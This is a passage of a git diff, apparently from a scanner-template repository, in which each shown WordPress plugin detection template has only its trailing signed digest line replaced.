490a00463044022019e7eae0bc8c6576473bf387af23abd4f67348937141432ef2b7b6e6a002b9bf02207210ea1d73af9740c3b4bd55a0ef3bb069eccffeb7182115f04c9f76391c3ceb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d684f735bb6e9125dc78a0fa8c6de280326aa72a21131a7acdb95ef36cd16464022100c8ab1809300586f61d786c78521b7b562f7d48e46374931beaafa1e4a2099b03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 61ff0d0ce0..626039cec1 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c52d6480b6f9622c6816cd3486b90e9f93c23e7278655879fcd76f1ab9429d080220041c63c44499ba3878d043e496393389805ce9d0a78eb58260e2e2ae54d9486b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210086e4e399f56369bc2a6e2280dafb6e7791840fe81bdf17b00d47e8c4ef1f754e022100fd6f2c252e36f138b1bf08dbead1a52a5df23676aa3b46271a96600d8eb35986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index 2851ea72f9..010cc342b2 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210081da7e0f612e9de8aeed53a1e71163e1697e29be3b325c4881c9010e4f46d8760220566b0e6734fce6a206ca050b084c7ff4ca3d48b356bac1deec38d5c884690165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a3b7d6c68d9d96a03825bcdb04adb933cac2ec15c9f19633b5825065c3b54e4e022100ec3bf52c2b8db8e942aaa78f8020f8d2af43bf57d837835a0ec4381b2c128a72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a8d37fbc63..4391a68f73 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e47e0c394c0de4062220715f1c047d5aa688494f0065db16a274572707cee5a102202c2242f786494a88c7936209dff2b611b2a0e8a8ed31d09c1088f56dd91d554e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e9e2012af3256790c48cf473a856bb3cd8dde30f837b9b0de9b377408b1ee7a002207ff60250b3dadb7426a54ca742e809c2ba9fbaf21c3baef95f85ab0ebd505412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 35cccec2e2..6e7902f29d 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402207f062ccf407ec442a9ba3e4c8cd5ea9e3c3891a186c4ea7d21f06ab9c2893877022061f0355d71f9ab693d465fe2d58a2ff1ca40e031425a091597f934c130e8de8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ed48e7464dcaffcb8b810cddf1392b6f6fba84ce5c940e2ac0bf82a19a0164e02200ccea8907917720bb9b999c579fb1d97f336411694dbb5a899378f214764374d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index e8615710b8..389f799348 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220478e9f490a6c2f8159dbf65cfebe2fa04b1d389af4438ea3770e805ef228408b02202516b59df6a3f6c9371e9bb67b56e12f5fa8db02a0cd231495a0f5f1cd14c872:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201957afdbf5bf6a348fe93c320f3bcc6b2b206f540b09b17993b81ce6917d127602205b1a0de3d3f24f1defaac988cad1daddc391e71fe7f3765f2ce6306d4fe61a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 21e9217dcd..cb88b6e88b 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f838d6f6758bfdec63f975675e63192452e78eb43c9e77c2d8e01a036bd7e051022100f267d138e2a04f5e4b31e23572cbf83d6fe5df246847267187ce5d672d423afb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de4754db3a98f1365931e3cb4e397ec9fc5b0fcf635767eb52fad28ee512c0d402210095d4a170be64406d6a58101d3f4fc8c67b2d0a19c514714263a46bd686cf1dd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index d107ff40dd..ed31f254f7 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220726d4136b536254a938a3427607845fb49b3a47f613117183bd757affba1b608022041bd13d77ccea778dc5d3305ee6414cf20eb688d4e98088a015fb33678cc6874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001d705f9c26b4b00f686a10e5f15b3261bcd195d2c88fb5ef83516a2e25268d202202f633a08b749a9ae9d88e3328d9f51f4ac8abc80c5a1ac37b4db5f786157980f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index 067cb07c65..a5e1827195 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022005888690c296d3f9e8ce68cfd329d46cf64ade1ce8ad7857903cafead171f249022005f0b82f8e45df2e0bdd1822084b48d1211c8b0305622a8549a3204f0a3723cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022078e4e56aec7d69e77596c39bd9b3951865c6c0f355fd0e6eb467a7be04f5e0ba022030d49e9c379c8ad735c9a6181a8381ec4a1e818ef191d093ea897e99906b2087:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index df8299e89d..dc92a1eca8 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502203d972c546ff4d9abf84f6a07a902b7196f6db15fe396c22fbdf912dc6a386da3022100aa5acfa749ed1310d9e3eb36a22de5e30c4ee7340246e011b2b03099c464f10f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035117b0c41fe76b22813490b622c71b6dee3b43c34e27e9a5570bb9f2f13e5250220091ff128c7f94df5e644772f84581579db2716f280cc3e75e6f8b49f34e69582:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index b3472b9aec..721c1a9ffc 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201c5f030988b8097b845a0f8687065ba3b863ea4a1d0928cbd480ffe26c2b82320221009a091437c910c7a1ca94272f001cae3f67627b98da681dbc8ef9d57793f850b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c78579c4250daef80cd8630c463c0e01a7788adaca5911fc8288408dd3a0e2b9022100a8018063abebd79e45486b606b172676008ffa9fcd430cdea617ae30fd3c3abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index fcc464c369..b5cf6755b2 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008dd88c3d86d078bbca869d0f2095c1880d5219e2ef9917057460b358ef07048202207232f49d11fb186dceb364688b1c619cc805c7bad890d03e85aa55fc211e22c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220469fe40f2c7797915d8adc687873d438b8d2162c088d491002b75fdb49ee7edd022002bfe4a2e1c07e4849560a5679f977f66ea3568692171a7987c9d7a69b71e548:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a173ff5a2b..099ab66832 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220788c3c2d3956fc678eba6d1c474d2c3bb6e5be95df022d100c26a34fc95dd96d022100e22e9ab4813b5c3d94d0018ec693abb958ad25ce3dad2097ea33bbbbefb26d10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fcd201ff75793a9f6d85e8c05c5845881512e17892801eb942118aebde1f840d02201c2d256a08df45cfba1d12e92e19c2549400fc5c11a29bbc7d324c4944b15bfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 8ee01427b1..b1b0c3a0db 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d2dac19f1c82172e42d4e67e9229c257a827757d332ce641d51006d05a04751702202b7b0b75ae4bdcb28b9bb53355e09e1e24a63df5e8e4eaf1ebec448b0e04a612:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a76d04f231e0763bf6e5ed549d91a6880d324071be36c808553acb98177b741a022100cc6c770f90e09e874fd86dd841830bddf049b850031e1a6a1ce6c8a3ad41a553:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index 26a2417a63..565a803bab 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502207e6a8e061c926c146755856dc566fd7fdcd9f5cfc610fd51fdb51ee31a01509c022100fd8474f2369be9e3679cd0804da0c4ab0ec154a753cc83d186264bcb004601cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220035f6968107e3e1a5e5fc0f4f9d468d0f026837b6de412fb5b2c2043da92da53022100d134063ba4f5e69940fd3bbc749db3f543286514b9485ba1b5b87e90a687e893:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index 2ac0d95762..308ac84ffe 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022056c22d35fb14aa42ba2102d9a616eaa132341797fe9038bbb82f53739a25fdd9022007db6d86959e15b2f46bb94ed77bcde03e8524dc1f4d707262eb5c8f728b73e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200af0d1dda9d3578e9162ac74073a5715a8ee18ba05cad0c2e7da9c4ae5afbfa902202ebd30c7866ccd5bdabcc145b950aef0c1e8755c3dbe1b540db85a41dd4d005c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 6595fc75d7..f4b03bbc19 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202598983556ee5a37dbf110ee530d4a75d4636b95ad0cca6410d274e235c8ad1a022030d2aae700ecd3d1816425826c86002796025fdb50e772d8ee9c98bc7ef0976f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da8c4d534e7c4e8ace6d83537f50f92e004bd78ce1b129e2549c09650ed69b02022035479b9f1f04787db6ebf7d3f699066eabd4c14163b52a6ef33b37229a116eeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index be304baaa7..35dbb4df99 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e419d05c5bccf50bbdfcd72d0164de2b4512a44a85c90ad377442feea54a33e2022100fc3a472eaa00749ad456a56fa2f45c67d5008b109154b3fb68e3eead776faa39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022004b62504a1522b01040f97348a6a062f6f89966a728d235cdad8a3018c2bcffc022016459e5a09188c94d5309e0a7a5147df120f0d1eef5223865b9e3705caef1ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index c92a557541..43d55d6c67 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100d43da5af14c842b12889c8c087d51f52866a2d2b71ebd3ea7a53bcf50a39706c022100b5c86b45da124fa9c4213ea2d715170ae410b9a581060c81727d0949d7206fd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f27d7023ff1421cea6d637609df44486ea931048cbe79320617a4abd01b246f20221009ebccbe45ffafbcfff16e3ccd7d841e24f2bd1d88c1cd1766f3ff0a7a044a772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index d93da12825..b6ff3ac71a 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100a8f1d671bc3a1c5bb08616dea55f221000788ddb34ad63b7e25274d224ccc98c022100b4ab555f3c44326a7da89d24ec39cbb5f3d5cb6ad0a8a506ea0abb29d227a0b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092cdfcf61d1008898d4374f94f521a51729aafccaa7050a905a2a6ad9d455252022068b94c1ae1ad1a0fb61d01e2f2d72720a967c298b059e804131fbdef69260838:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index a37badb9c9..a0b13294bb 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b656b3c892a7913eb8afd2eb5f1683134633535b6d27fc5f51e3390ed261769c022056b21f1934a33c7d2ee9bb495796cde17fca0006eaeb129e8608358eaea1782a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aac909f91a35269c19d05b43c218f58df4bff35a5fab7026f41b410a0e27add7022052a143d3808137dfcf7975ea87f8baef769476cc77c132bdb8100c2d72e83c4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index af60d93d06..d85fa33de3 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210085408a62ddc1a160b3346b1453306f413b3ef94c47977b51b38c007ef7ef7361022100d5b8edbb3884406b975d8e557bacc35f7613d6dfc907b9f369086f7bb7277862:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097c3d259a6ba05d8f0b46b07e76b6865bebe927e418a1f385f57b1eaa1c388cd0220482c9d7d4af5883bd23368e4ee61afd2a0e57f6018e6ea418c1698513cf03a8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 4983c5ee24..3c79ff070a 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100f3226219a0363bb09c8f6bfb864a3a61a06c750059cbcf2c734989ca124d6c4102204ee571b2d1616f58d1095f988e9f14cde3d432816fa0ad65ea5d62c7a8dc6fdf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022037454061542f1170aa66f699c86d3ca9a5da1cf17b6ba8ff2a9ccb4403c9e15a0221009e78736ac436836ad70323d4554d86f9652bbea949081ed44b2aec1069db1556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 939c69c3aa..b42c756957 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204d433c2b66b080555e9039867b9a433f476e6b809c295799ac1c6525475ca6bc022100d1b4229ebe4ecb1ae0cf70154ebe096943740e82290a0c9563cccfdad0e7da3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fe87167d9251652cb020ef094914c228d475049c0ef89e9f104ad45965dd793e0221009cb55d6bb095d7997e1c0c206dfe83f2f6e43ee804240ccfc41d0808a268a6bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 6a5d2d1438..da80c9460d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210088171cbd2949d7a40a2bdd258016196d9af6836a4475dffbae37f1b9931863da02200a7cfdaae27cc61d700559a870a656bf2d399a48db3b79562091d600edd02262:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b317e5f6d9ff1a5c7cc16f6fa5480a24d2a8ded092757542e84eede17b951d18022100ccb72d7f928da145c2094a95e20d4d4d117d81f446dace8ff10b1c30ad42707c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 3ca2e45f80..b50f2b2df8 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210093595fe79c6b8af0bffcbe9d459e526fe23c6aaca5f8d9b43aeaed95475f693002200c5c54abd6603930b15c6f7239923fa3d026f9041f9fa18538d49971f418b8d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f0c547f6bc09e8d1de57b4bf080573edb0a77c82fec3bd64a4265f37861db42022042a1bbaeb32b629ab5a94fa4d37310a6deb6fae8b948c228bb45a2a7bc8ae167:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 84705f2eba..3111c7ffb2 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022078765e6f80cba3969ddfc281b8749fc0d18f597f053419c7735a3d04177d4082022100a70a47cad2e8bdbab47c6f77f9180ef7ae2e7bd3a300d2097e3a410c8470aae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220479221ae2ef6616840994d80464ec0a4e3fa0394f41fa8496f1e214263acadab02205496af81fec9454dd42f54a32e5f64df221bcd8abb61c038d79b27a25f1a0c48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 1b10e16957..a2839a7927 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f0788915ddc49423e1403c925d4723f2350b49c267e785e3a497a43e69db41e8022100d148e1bac8dd0c0e3691701d0b76a0a8c4c502a0d8d857f56f269b61be248d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad535952f1774eb3ed8b62e32a3b6d2344fea9054fb3bb7974ac2eb8abbb3362022031e12e739e9986cf1dba6bbe8053877b44bfa6749378c32a868dc8b3cf221dc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 0a4d2f8720..74df3e5b2c 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c1324ef3f5b2470708702ea632a57f7fdac3acf04f3636ae30f79080cfc5b357022100caf6aa54f687a00de211e47b70d242f4d1867c71c2624025425c6c8ef33550ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201dfabdf21e8fc0f27a758af673b2de3b76e1b17a638adb9b7ddf5e8189fb4ce5022100800aead8ccec3a754ee3233d01c7e7b3265e1939f4fee79afd19b7bbdf9b4ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 9664219951..5c0a227dab 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206cbe33f47fb1b296a6922b9055e3c2c6d7ada9a07b6bc446c57acc23f53b2b550220606d568e9df85c9ac6e7189a2865300afbd7e6096f0326b26e80d3ef73eda0b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab75f28c24004e7395e21da0f29ac4577acef2ae95d986880e0ee8137eacc3f5022100f995617ebb6a94bd0c1dd3c6df7e657be3723f9ed9a913f2f46347805ae411fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index a230883ddc..094e7240e0 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d9d44eb75ca2b66bea5919430558280d0cf4521bbae14f35a001ab5441599d2702203ac320bd2d88e4615a618a028f53ea5abfb891596f08ab4d19b9f5a7ee9672d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f6ff5f59a977627f6163d61d5e74b3f209ec111a6a6682eab98e7c0e19e22e4022100842d1083386ddd5ad50c35a1578cee5d06455756f1529201f22e434bf95fb540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 673a7146b4..598e66b193 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100abd31f4236f98a48d5c16dc6b52874dc91247fbc5c5c3282e73e43d65665daf0022100dce27a734627655a4b92e8535f47408976fbc464fe93ef7735549ee59a5d1200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207dcfcce7701a74ed5b824c77f72325e59f8be1ce3cb9c560c66ca55c34515d35022041930b199e38e873da28c474800c1e122c041b23430dad10bdf8bbacd7f6f9f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 6ab6255615..764bb5fa57 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100ffb1227a28bee13675d070e2e29276df5a45159306a0233c83f7d7ba557671d7022100e559a703f771a168ac9ddf4029a0811113ec2c80bca7a859e269a61fcf52d53f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad961cb1e858fd0f527e3d966c0e39b698b865c25f938b009a0d74d24f7e1abe02206a53852c633d4b0cea0006e9221a583a52ab35d82ffdeb61453f96b2b2c09b8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 9c3fb59201..10f700ed55 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204d0df91b337680d19ccf60f4605e6f33e607a35a981a40faf65c2a199213239a022100edce7abbb47e3d09542a0ff7ba900de84b1cdba7b1f9f35db0db1ad7e3fcd41a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 